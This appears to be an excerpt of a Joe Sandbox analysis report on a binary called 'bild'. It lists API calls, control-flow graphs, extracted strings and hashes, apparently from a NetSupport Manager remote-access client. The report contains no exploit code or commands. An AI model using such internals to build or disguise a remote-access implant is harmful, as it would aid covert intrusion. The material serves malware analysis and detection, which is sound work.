                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                      • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                      • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                      Function 1102E640 Relevance: 243.4, APIs: 31, Strings: 107, Instructions: 1869windowthreadsleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                        • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                      • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                      • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                        • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                        • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                      • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                      • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                      • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                      • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                      • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                      • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                      • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                        • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                        • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                        • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                      • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                      • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                      • SetWindowPos.USER32(0002046E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                      • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                      • wsprintfA.USER32 ref: 1102FFA5
                                                                                      • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                      • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,4012B9B4,00000002,74DF2EE0), ref: 1112820A
                                                                                        • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                        • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                      • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$405464$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui$
                                                                                      • API String ID: 1099283604-2653192210
                                                                                      • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                      • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                      • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52
                                                                                      Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 994 1102db00-1102db50 call 1110f420 997 1102db52-1102db66 call 11142a60 994->997 998 1102db68 994->998 1000 1102db6e-1102dbb3 call 11142290 call 11142ac0 997->1000 998->1000 1006 1102dd53-1102dd62 call 11144dc0 1000->1006 1007 1102dbb9 1000->1007 1013 1102dd68-1102dd78 1006->1013 1008 1102dbc0-1102dbc3 1007->1008 1010 1102dbc5-1102dbc7 1008->1010 1011 1102dbe8-1102dbf1 1008->1011 1014 1102dbd0-1102dbe1 1010->1014 1015 1102dbf7-1102dbfe 1011->1015 1016 1102dd24-1102dd3d call 11142ac0 1011->1016 1017 1102dd7a 1013->1017 1018 1102dd7f-1102dd93 call 1102cc10 1013->1018 1014->1014 1019 1102dbe3 1014->1019 1015->1016 1020 1102dcf3-1102dd08 call 11162de7 1015->1020 1021 1102dc05-1102dc07 1015->1021 1022 1102dd0a-1102dd1f call 11162de7 1015->1022 1023 1102dc9a-1102dccd call 111618c1 call 11142290 1015->1023 1024 1102dcdb-1102dcf1 call 11164010 1015->1024 1025 1102dc8b-1102dc95 1015->1025 1026 1102dccf-1102dcd9 1015->1026 1027 1102dc4c-1102dc52 1015->1027 1028 1102dc7c-1102dc86 1015->1028 1016->1008 1046 1102dd43-1102dd45 1016->1046 1017->1018 1042 1102dd98-1102dd9d 1018->1042 1019->1016 1020->1016 1021->1016 1033 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1021->1033 1022->1016 1023->1016 1024->1016 1025->1016 1026->1016 1035 1102dc54-1102dc68 call 11162de7 1027->1035 1036 1102dc6d-1102dc77 1027->1036 1028->1016 1033->1016 1035->1016 1036->1016 1048 1102de43-1102de5d call 111463d0 1042->1048 1051 1102dda3-1102ddc8 call 110b7920 call 11146450 1042->1051 1046->1048 1049 1102dd4b-1102dd51 1046->1049 1061 1102deb3-1102debf call 1102b4f0 1048->1061 1062 1102de5f-1102de78 call 1105dd10 1048->1062 1049->1006 1049->1013 1069 1102ddd3-1102ddd9 1051->1069 1070 1102ddca-1102ddd1 1051->1070 1074 1102dec1-1102dec8 1061->1074 1075 1102de98-1102de9f 1061->1075 1062->1061 1073 1102de7a-1102de8c 1062->1073 1076 1102dddb-1102dde2 call 11027d60 1069->1076 1077 1102de39 1069->1077 1070->1048 1073->1061 1088 1102de8e 1073->1088 1078 1102dea5-1102dea8 1074->1078 1080 1102deca-1102ded4 1074->1080 1075->1078 1079 1102e0aa-1102e0cb GetComputerNameA 1075->1079 1076->1077 1093 1102dde4-1102de16 1076->1093 1077->1048 1085 1102deaa-1102deb1 call 110b7920 1078->1085 1086 1102ded9 1078->1086 1082 1102e103-1102e109 1079->1082 1083 1102e0cd-1102e101 call 11027c30 1079->1083 1080->1079 1090 1102e10b-1102e110 1082->1090 1091 1102e13f-1102e152 call 11164010 1082->1091 1083->1082 1116 1102e157-1102e163 1083->1116 1092 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1085->1092 1086->1092 1088->1075 1095 1102e116-1102e11a 1090->1095 1112 1102e347-1102e36a 1091->1112 1141 1102e07a-1102e082 SetLastError 1092->1141 1142 1102dfbc-1102dfd3 1092->1142 1106 1102de20-1102de2f call 110f6080 1093->1106 1107 1102de18-1102de1e 1093->1107 1103 1102e136-1102e138 1095->1103 1104 1102e11c-1102e11e 1095->1104 1111 1102e13b-1102e13d 1103->1111 1109 1102e132-1102e134 1104->1109 1110 1102e120-1102e126 1104->1110 1114 1102de32-1102de34 call 1102d330 1106->1114 1107->1106 1107->1114 1109->1111 1110->1103 1117 1102e128-1102e130 1110->1117 1111->1091 1111->1116 1127 1102e392-1102e39a 1112->1127 1128 1102e36c-1102e372 1112->1128 1114->1077 1122 1102e165-1102e17a call 110b7920 call 11029bd0 1116->1122 1123 1102e17c-1102e18f call 11081a70 1116->1123 1117->1095 1117->1109 1149 1102e1d3-1102e1ec call 11081a70 1122->1149 1139 1102e191-1102e1b4 1123->1139 1140 1102e1b6-1102e1b8 1123->1140 1131 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1127->1131 1132 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1127->1132 1128->1127 1130 1102e374-1102e38d call 1102d330 1128->1130 1130->1127 1132->1131 1139->1149 1147 1102e1c0-1102e1d1 1140->1147 1152 1102e043-1102e04f 1141->1152 1142->1152 1163 1102dfd5-1102dfde 1142->1163 1147->1147 1147->1149 1166 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1149->1166 1167 1102e32c-1102e339 call 11164010 1149->1167 1156 1102e092-1102e0a1 1152->1156 1157 1102e051-1102e05d 1152->1157 1156->1079 1165 1102e0a3-1102e0a4 FreeLibrary 1156->1165 1161 1102e06f-1102e073 1157->1161 1162 1102e05f-1102e06d GetProcAddress 1157->1162 1169 1102e084-1102e086 SetLastError 1161->1169 1170 1102e075-1102e078 1161->1170 1162->1161 1163->1152 1168 1102dfe0-1102e016 call 11146450 call 1112b270 1163->1168 1165->1079 1206 1102e283-1102e299 call 11128ec0 1166->1206 1207 1102e26f-1102e27e call 11029450 1166->1207 1184 1102e33c-1102e341 CharUpperA 1167->1184 1168->1152 1189 1102e018-1102e03e call 11146450 call 11027920 1168->1189 1175 1102e08c 1169->1175 1170->1175 1175->1156 1184->1112 1189->1152 1211 1102e2b2-1102e2ec call 110d0bd0 * 2 1206->1211 1212 1102e29b-1102e2ad call 110d0bd0 1206->1212 1207->1206 1219 1102e302-1102e32a call 11164010 call 110d07c0 1211->1219 1220 1102e2ee-1102e2fd call 11029450 1211->1220 1212->1211 1219->1184 1220->1219
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc_memsetwsprintf
                                                                                      • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$405464$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                      • API String ID: 3802068140-2130165175
                                                                                      • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                      • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                      • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
                                                                                      Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1857 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 1858 110a9cf8-110a9d09 SetupDiGetClassDevsA 1857->1858 1859 110a9e05-110a9e0d SetLastError 1857->1859 1860 110a9d0f-110a9d1d 1858->1860 1861 110a9f13-110a9f15 1858->1861 1865 110a9e19-110a9e1b SetLastError 1859->1865 1862 110a9d20-110a9d24 1860->1862 1863 110a9f1e-110a9f20 1861->1863 1864 110a9f17-110a9f18 FreeLibrary 1861->1864 1866 110a9d3d-110a9d55 1862->1866 1867 110a9d26-110a9d37 GetProcAddress 1862->1867 1868 110a9f37-110a9f52 call 11161d01 1863->1868 1864->1863 1869 110a9e21-110a9e2c GetLastError 1865->1869 1866->1869 1880 110a9d5b-110a9d5d 1866->1880 1867->1865 1867->1866 1871 110a9e32-110a9e3d call 11162be5 1869->1871 1872 110a9ec0-110a9ed1 GetProcAddress 1869->1872 1871->1862 1874 110a9edb-110a9edd SetLastError 1872->1874 1875 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 1872->1875 1879 110a9ee3-110a9ee5 1874->1879 1875->1879 1879->1861 1881 110a9ee7-110a9f09 CreateFileA 1879->1881 1882 110a9d68-110a9d6a 1880->1882 1883 110a9d5f-110a9d65 call 11162be5 1880->1883 1884 110a9f0b-110a9f10 call 11162be5 1881->1884 1885 110a9f22-110a9f2c call 11162be5 1881->1885 1887 110a9d6c-110a9d7f GetProcAddress 1882->1887 1888 110a9d85-110a9d9b 1882->1888 1883->1882 1884->1861 1897 110a9f2e-110a9f2f FreeLibrary 1885->1897 1898 110a9f35 1885->1898 1887->1888 1891 110a9e42-110a9e4a SetLastError 1887->1891 1895 110a9d9d-110a9da6 GetLastError 1888->1895 1899 110a9dac-110a9dbf call 11162b51 1888->1899 1891->1895 1895->1899 1900 110a9e81-110a9e92 call 110a9c30 1895->1900 1897->1898 1898->1868 1905 110a9ea2-110a9eb3 call 110a9c30 1899->1905 1906 110a9dc5-110a9dcd 1899->1906 1907 110a9e9b-110a9e9d 1900->1907 1908 110a9e94-110a9e95 FreeLibrary 1900->1908 1905->1907 1914 110a9eb5-110a9ebe FreeLibrary 1905->1914 1910 110a9dcf-110a9de2 GetProcAddress 1906->1910 1911 110a9de4-110a9dfb 1906->1911 1907->1868 1908->1907 1910->1911 1913 110a9e4f-110a9e51 SetLastError 1910->1913 1915 110a9e57-110a9e71 call 110a9c30 call 11162be5 1911->1915 1918 110a9dfd-110a9e00 1911->1918 1913->1915 1914->1868 1915->1907 1922 110a9e73-110a9e7c FreeLibrary 1915->1922 1918->1862 1922->1868
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(setupapi.dll,4012B9B4,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                      • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                      • _free.LIBCMT ref: 110A9D60
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                      • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                      • _malloc.LIBCMT ref: 110A9DB3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                      • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                      • GetLastError.KERNEL32 ref: 110A9E21
                                                                                      • _free.LIBCMT ref: 110A9E33
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                      • _free.LIBCMT ref: 110A9E64
                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                      • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                      • API String ID: 3464732724-3340099623
                                                                                      • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                      • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                      • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50
                                                                                      Function 11133920 Relevance: 52.8, APIs: 16, Strings: 14, Instructions: 278libraryloadertimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
